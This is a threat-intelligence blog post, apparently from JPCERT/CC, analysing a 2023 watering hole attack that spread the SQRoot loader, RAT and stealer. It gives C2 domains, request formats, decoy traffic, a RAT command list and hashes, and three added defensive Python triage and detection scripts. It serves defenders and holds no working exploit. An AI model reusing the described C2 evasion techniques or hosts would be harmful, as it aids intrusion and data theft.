Recent cases of watering hole attacks: Part 2

31 Jan 2025

Category: Tech matters

As discussed in part 1 of this series, vulnerabilities in exposed assets like VPNs and firewalls are frequently exploited by Advanced Persistent Threat (APT) groups, ransomware operators, and cybercriminals, with many incidents reported to JPCERT/CC. However, as these attacks increase, other vectors, such as email, websites, and social media, risk being overlooked.

Continuing from the previous article, this post explores another case of a watering hole attack, this time exploiting a media-related website in 2023.

The flow of the attack

Figure 1 illustrates the flow of the watering hole attack. When a user accesses the compromised website, an LZH file is downloaded. Executing the LNK file within the LZH file results in malware infecting the user’s PC.

Figure 1 — Flow of the attack.

The compromised website had JavaScript embedded in it, as shown in Figure 2, and the malware is served only to users who log in to the website with a specific account (HTTP basic authentication).

Figure 2 — Malicious code embedded in the tampered website (1).

The webpage that starts the malware download displays a message, as shown in Figure 3, indicating that the site is undergoing maintenance, and the LZH file is downloaded automatically. Additionally, if the user cannot extract the LZH file, the webpage includes a link to download the legitimate decompression software, Lhaplus.

Figure 3 — Malicious code embedded in the tampered website (2).

Malware used in the attack

The malware downloaded by this attack is contained in an LNK file, as shown in Figure 4.

Figure 4 — Flow of malware infection.

As shown in Figure 5, the LNK file contains a ZIP file with the actual malware and a VBS file for extracting it. Both files are Base64-encoded and are extracted when the LNK file is executed.

Figure 5 — Malicious code contained in the LNK file.
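The LNK described above carries its ZIP and VBS payloads as Base64 text. The following script is an added example (not code from the JPCERT/CC post) showing how to carve such payloads out of a shell link file for triage: it checks the Shell Link header, finds long Base64 runs, decodes each run and labels it by magic bytes or script keywords, and lists the ZIP members. The sample LNK is constructed inline (a minimal header, filler, and two Base64 blobs separated by CRLF); the 64-character run threshold and the blob layout are assumptions, as is the keyword test used to recognise VBS.

```python
"""Carve Base64-encoded payloads out of an LNK file (added example)."""
import base64
import io
import re
import zipfile

# A run of at least 64 Base64 characters with optional padding. The threshold
# is an assumption chosen to skip short alphanumeric strings inside the LNK.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

# Shell Link header: HeaderSize 0x4C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in little-endian GUID layout.
LNK_HEADER_SIZE = b"\x4c\x00\x00\x00"
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")


def is_lnk(data: bytes) -> bool:
    """True if the buffer starts with a Shell Link header."""
    return data[:4] == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def classify(blob: bytes) -> str:
    """Label a decoded payload by its leading bytes or script keywords."""
    if blob.startswith(b"PK\x03\x04"):
        return "zip"
    if blob.startswith(b"MZ"):
        return "pe"
    head = blob[:256].lower()
    if b"createobject(" in head or b"wscript." in head:   # assumed VBS markers
        return "vbs"
    return "unknown"


def carve_payloads(data: bytes) -> list:
    """Return every decodable Base64 run with its offset, type and size."""
    found = []
    for m in B64_RUN.finditer(data):
        run = m.group(0)
        try:
            blob = base64.b64decode(run + b"=" * (-len(run) % 4), validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        entry = {"offset": m.start(), "type": classify(blob), "size": len(blob)}
        if entry["type"] == "zip":
            with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                entry["members"] = zf.namelist()
        found.append(entry)
    return found


def build_sample_lnk() -> bytes:
    """Constructed stand-in for the malicious LNK: header, filler, two Base64 blobs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("iusb3mon.exe", "iusb3mon.dll", "dmiapi32.dll"):
            zf.writestr(name, b"MZ" + b"\x00" * 62)      # stand-in bytes, not real PEs
    zip_bytes = buf.getvalue()
    vbs = (b'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
           b'WScript.Echo "stand-in extractor"\r\n')
    filler = b"\x00" * 40                                # rest of the link structure
    return (LNK_HEADER_SIZE + LNK_CLSID + filler
            + base64.b64encode(zip_bytes) + b"\r\n"
            + base64.b64encode(vbs) + b"\r\n")


if __name__ == "__main__":
    sample = build_sample_lnk()
    print("LNK header present:", is_lnk(sample))
    for p in carve_payloads(sample):
        print(p)
```

On a real sample, pass the file contents to `carve_payloads` and save any `zip` or `pe` entries for further analysis rather than executing the LNK.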

The ZIP file contains the legitimate executable iusb3mon.exe and two DLLs. iusb3mon.exe loads iusb3mon.dll, which is the usual DLL side-loading setup. As shown in Figure 6, however, a section named newimp has been added to iusb3mon.dll, and the code in that section loads the actual malware, dmiapi32.dll (malware name: SQRoot).

Figure 6 — The newimp section added to iusb3mon.dll.
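An added section such as newimp is visible in the PE section table, so a quick triage check is to list the sections of a side-loaded DLL and flag any that a normal build would not contain. The script below is an added example (not code from the post or from any tool it mentions): a small IMAGE_SECTION_HEADER parser plus a rule that flags non-standard section names and sections that are both writable and executable. The allow-list of section names is an assumption, and the sample DLL is constructed inline with a zeroed optional header; the real iusb3mon.dll's section flags are not given in the post, so the flags on the constructed newimp section are assumed.

```python
"""List PE section headers and flag sections a normal linker would not emit (added example)."""
import struct

# Section names typically emitted by MSVC/MinGW builds (assumed allow-list).
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                  ".rsrc", ".reloc", ".tls", ".bss", ".CRT", ".gfids", ".00cfg"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")   # 40-byte IMAGE_SECTION_HEADER


def pe_sections(data: bytes) -> list:
    """Parse the section table: MZ -> e_lfanew -> PE\\0\\0 -> COFF -> optional -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]    # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]       # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        fields = SECTION_HEADER.unpack_from(data, table + i * SECTION_HEADER.size)
        sections.append({
            "name": fields[0].rstrip(b"\x00").decode("ascii", "replace"),
            "virtual_size": fields[1], "virtual_address": fields[2],
            "raw_size": fields[3], "raw_pointer": fields[4],
            "characteristics": fields[9],
        })
    return sections


def suspicious_sections(sections: list) -> list:
    """Return (name, reasons) for sections with an unusual name or W+X permissions."""
    flagged = []
    for s in sections:
        reasons = []
        if s["name"] not in KNOWN_SECTIONS:
            reasons.append("non-standard name")
        if (s["characteristics"] & IMAGE_SCN_MEM_EXECUTE
                and s["characteristics"] & IMAGE_SCN_MEM_WRITE):
            reasons.append("writable and executable")
        if reasons:
            flagged.append((s["name"], reasons))
    return flagged


def build_sample_pe(sections: list) -> bytes:
    """Constructed minimal PE32+ image: DOS header, COFF header, zeroed optional header, section table."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)             # e_lfanew -> right after the DOS header
    optional = bytes(0xF0)                             # PE32+ optional header size, contents zeroed
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(optional), 0x2022)
    table, vaddr, raw_ptr = b"", 0x1000, 0x400
    for name, chars in sections:
        table += SECTION_HEADER.pack(name.encode().ljust(8, b"\x00"),
                                     0x1000, vaddr, 0x200, raw_ptr, 0, 0, 0, 0, chars)
        vaddr += 0x1000
        raw_ptr += 0x200
    return bytes(dos) + b"PE\x00\x00" + coff + optional + table


# Stand-in for the tampered side-loaded DLL: four normal sections plus an appended
# "newimp" section; its W+X flags are an assumption for the example.
SIDELOADED_DLL = build_sample_pe([
    (".text", 0x60000020), (".rdata", 0x40000040), (".data", 0xC0000040),
    (".reloc", 0x42000040), ("newimp", 0xE0000020),
])

if __name__ == "__main__":
    for s in pe_sections(SIDELOADED_DLL):
        print(f"{s['name']:<8} va=0x{s['virtual_address']:06x} raw=0x{s['raw_pointer']:06x} "
              f"flags=0x{s['characteristics']:08x}")
    print("suspicious:", suspicious_sections(pe_sections(SIDELOADED_DLL)))
```

Run `pe_sections` on the DLL bytes from disk; a trailing section with an unfamiliar name (as newimp here) or with W+X flags is worth a closer look even when the file's version resource and signature look legitimate.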

SQRoot (dmiapi32.dll)

SQRoot is malware that downloads plugins from the C2 server to extend its functionality. The plugins it downloads are listed in Table 1.

Plugin file name   Function
8015ba282c.tmp     Download and execute RAT disguised as an image file
abb8fcc3b5.tmp     Download and execute shell code
8714c42184.tmp     Unknown
6eadde753d.tmp     Unknown
Table 1 — Plugins and their function.

When SQRoot communicates with the C2 server it sends client information in the request body, encrypted with ChaCha20. A unique ID is embedded in the User-Agent header (in place of the Firefox version number in the example below), and the x-auth header carries the string aq followed by a BASE64-encoded 12-byte nonce.

POST /papers/en-jp/task HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/9a.3f.6b.7f.18.ee.0f
x-auth: aq8bvp67Om2zyHDD6Z
Content-Length: [Size]
Host: [Server name]

SQRoot only communicates with the C2 server between 9:00 and 18:00 (UTC+9), Monday to Friday. It also sends decoy requests at regular intervals, such as those below, so that its real C2 traffic blends in with ordinary web browsing.

https://dict.digibulk.live/index
https://dict.digibulk.live/favicon.ico
https://dict.digibulk.live/jss/font-awesome.min.css
https://dict.digibulk.live/css/jquery-ui.min.css

SQRoot RAT

When the plugin 8015ba282c.tmp is downloaded, it in turn downloads malware disguised as a BMP file (SQRoot RAT), as shown in Figure 7. SQRoot RAT likewise communicates with the C2 server only between 9:00 and 18:00 (UTC+9), Monday to Friday.

Figure 7 — A part of the SQRoot RAT disguised as a BMP file.

SQRoot RAT encrypts data with RC4 before sending it to the C2 server. The commands it can execute are listed in Appendix C.

POST /weekly/img/new/paper.php?hid=[fixed value]&uid=[unique ID]&cid=[command] HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54
Content-Length: [size]
Host: [server name]

[RC4 data]
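The SQRoot request headers, its business-hours beacon window and decoy requests, and the SQRoot RAT task URL above are all observable in web-proxy records. The script below is an added example (not code from the post) that triages exported proxy records for these indicators: it flags a User-Agent whose Firefox version slot holds a dotted-hex ID, an x-auth header of the form aq plus a Base64 12-byte nonce, and a POST to paper.php with hid/uid/cid parameters; per host it then counts decoy-path requests and any flagged beacons outside Mon-Fri 09:00-18:00 JST. The record format (a list of dicts with ts, method, url, headers) and the sample records are constructed; the dotted-hex shape of the ID is inferred from the single User-Agent shown in the post and is therefore an assumption.

```python
"""Triage exported web-proxy records for SQRoot / SQRoot RAT beaconing (added example)."""
import base64
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlparse

JST = timezone(timedelta(hours=9))

# SQRoot puts its unique ID where the Firefox version number belongs. The
# "dotted two-character hex groups" shape is inferred from the one sample in
# the post, so this pattern is an assumption. Real versions ("115.0") do not match.
SQROOT_UA = re.compile(r"Firefox/([0-9a-f]{2}(?:\.[0-9a-f]{2}){3,})$")
# x-auth: "aq" + Base64 of a 12-byte nonce (16 characters, no padding).
SQROOT_XAUTH = re.compile(r"^aq([A-Za-z0-9+/]{16})$")
# Decoy paths SQRoot requests to blend in (taken from the post).
DECOY_PATHS = {"/index", "/favicon.ico", "/jss/font-awesome.min.css",
               "/css/jquery-ui.min.css"}


def in_beacon_window(ts: datetime) -> bool:
    """True if ts (timezone-aware) falls in Mon-Fri 09:00-18:00 JST."""
    local = ts.astimezone(JST)
    return local.weekday() < 5 and 9 <= local.hour < 18


def classify_request(req: dict) -> list:
    """Return the SQRoot indicators matched by one request record."""
    reasons = []
    headers = {k.lower(): v for k, v in req["headers"].items()}
    m = SQROOT_UA.search(headers.get("user-agent", ""))
    if m:
        reasons.append(f"SQRoot User-Agent ID {m.group(1)}")
    m = SQROOT_XAUTH.match(headers.get("x-auth", ""))
    if m and len(base64.b64decode(m.group(1))) == 12:
        reasons.append("SQRoot x-auth nonce")
    url = urlparse(req["url"])
    query = parse_qs(url.query)
    if (req["method"] == "POST" and url.path.endswith("/paper.php")
            and {"hid", "uid", "cid"}.issubset(query)):
        reasons.append(f"SQRoot RAT task request cid={query['cid'][0]}")
    return reasons


def triage(records: list) -> dict:
    """Group hits per host; count decoy requests and flagged beacons outside the JST window."""
    hosts = {}
    for rec in records:
        url = urlparse(rec["url"])
        entry = hosts.setdefault(url.hostname, {"hits": [], "decoys": 0, "outside_window": 0})
        reasons = classify_request(rec)
        if reasons:
            entry["hits"].append((rec["ts"], reasons))
            if not in_beacon_window(datetime.fromisoformat(rec["ts"])):
                entry["outside_window"] += 1
        elif url.path in DECOY_PATHS:
            entry["decoys"] += 1
    return {host: e for host, e in hosts.items() if e["hits"]}


# Constructed records, not real logs. Timestamps are UTC; 2023-06-12 is a Monday.
SAMPLE_RECORDS = [
    {"ts": "2023-06-12T01:30:00+00:00", "method": "POST",
     "url": "https://dict.digibulk.live/papers/en-jp/task",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) "
                               "Gecko/20100101 Firefox/9a.3f.6b.7f.18.ee.0f",
                 "x-auth": "aq8bvp67Om2zyHDD6Z", "Content-Type": "application/octet-stream"}},
    {"ts": "2023-06-12T01:31:00+00:00", "method": "GET",
     "url": "https://dict.digibulk.live/favicon.ico", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"ts": "2023-06-12T01:32:00+00:00", "method": "GET",
     "url": "https://dict.digibulk.live/jss/font-awesome.min.css",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"ts": "2023-06-12T08:00:00+00:00", "method": "POST",
     "url": "https://mnc.poiuuioq.space/weekly/img/new/paper.php?hid=0001&uid=7f3a&cid=1129",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                               "(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54"}},
    {"ts": "2023-06-10T03:00:00+00:00", "method": "GET",      # Saturday, benign browsing
     "url": "https://www.example.com/",
     "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:115.0) Gecko/20100101 Firefox/115.0"}},
]

if __name__ == "__main__":
    for host, entry in triage(SAMPLE_RECORDS).items():
        print(host, entry)
```

The x-auth and User-Agent rules are the high-confidence signals; the decoy-path count and the "all beacons inside JST business hours" property are supporting context, since on their own they also describe legitimate browsing from a Japanese office.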

SQRoot Stealer

Another malware, SQRoot Stealer, has been discovered on hosts infected with SQRoot. This malware is designed to steal information. Figure 8 illustrates the execution flow of SQRoot Stealer.

Figure 8 — Flow of SQRoot Stealer execution.

The actual malware is nvprojects.dll, which, like SQRoot, runs after being loaded into the legitimate file nvSmart.exe and extends its functionality with plugins. Examples of plugins:

  • jtpa_record_4_0.tmp: keylogger
  • jtpa_snap_2_0_1.tmp: screen capture
  • jtpa_un_cat.tmp: send file

Attribution

The attack group responsible for the watering hole attack discussed in this article remains unidentified. However, we have confirmed that the malware file names used in this attack (nvSmart.exe, nvsmartmax.dll, iusb3mon.exe, iusb3mon.dll) have been previously associated with APT10. Additionally, a web shell known as Weevely was installed on the website used in the attack.

In closing

In this and the previous blog post, we’ve dissected cases of watering hole attacks where the attackers aimed to infect their targets with malware through social engineering rather than by exploiting vulnerabilities. While current security measures often focus on addressing vulnerabilities in publicly accessible assets, it is equally important to remain vigilant against social engineering attacks like these.

Appendix A: C2 servers

dict.digibulk.live
mnc.poiuuioq.space
gogo.qiohanwy.store
158.247.192.54

Appendix B: Malware hash values

SQRoot
154cbce8afc48bc6d0f59726250fe7b9981ecdd0ce44fad48a3a662e3eb64135

SQRoot Plugin(8015ba282c.tmp)
f4cd4b51df47ba50c870657ff094c3355a6567f3cc77abcc4894cdaf57b2f0bd

SQRoot RAT
bb0c9d80220a93c2f9fe442f3a2ef2b41db44d9367483c8f22a25732478af82a

SQRoot Stealer
a30943c524cbf5989ca74d3d78709d40a82da2bc760afe938fa76cd21c443484

jtpa_snap_2_0_1.tmp
6988afa7950e0cecdc24e472f7e31ce855a29458c3b908554bf473686a97069b

jtpa_snap_2_0_1.tmp
0be4b77b667af42771189d697644b1760ce7c3d341a0d8d06fed0a81c4a1e253

jtpa_un_cat.tmp
41de808ce98285d750766d2a5b96cb8ddd972e282501dede2d5032de380f2146

Appendix C: Commands

Command ID   Function
1128         Create named pipe
1129         Download
112A         Upload
112B         Set sleep time
112C         Terminate
112D         Send drive information
112E         Send file list
112F         Delete file
1130         Change file name
1131         Copy file
1132         Create a folder
1133         Run process
1134         Run process + send the result
Table 2 — List of commands.

The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.
